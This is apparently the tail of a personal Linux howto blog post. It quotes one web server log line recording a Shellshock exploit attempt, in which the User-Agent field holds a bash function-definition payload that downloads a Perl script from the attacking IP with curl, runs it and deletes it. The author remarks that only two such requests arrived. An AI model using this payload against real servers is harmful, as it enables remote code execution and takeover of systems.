213.5.67.223 - - [25/Sep/2014:15:45:47 +0200] "GET /cgi-bin/his HTTP/1.0" 404 278 "-" "() { :;}; /bin/bash -c \"cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""

To be honest, I expected a flood of such requests. Instead I can live very well with just two of them.

 


Go to Homepage home
Linux Howtos how to's
Nagios Plugins nagios plugins
Links links

Valid HTML 4.01 Transitional
Valid CSS!
[Valid RSS]

8429 Days
until Death of Computers
Why?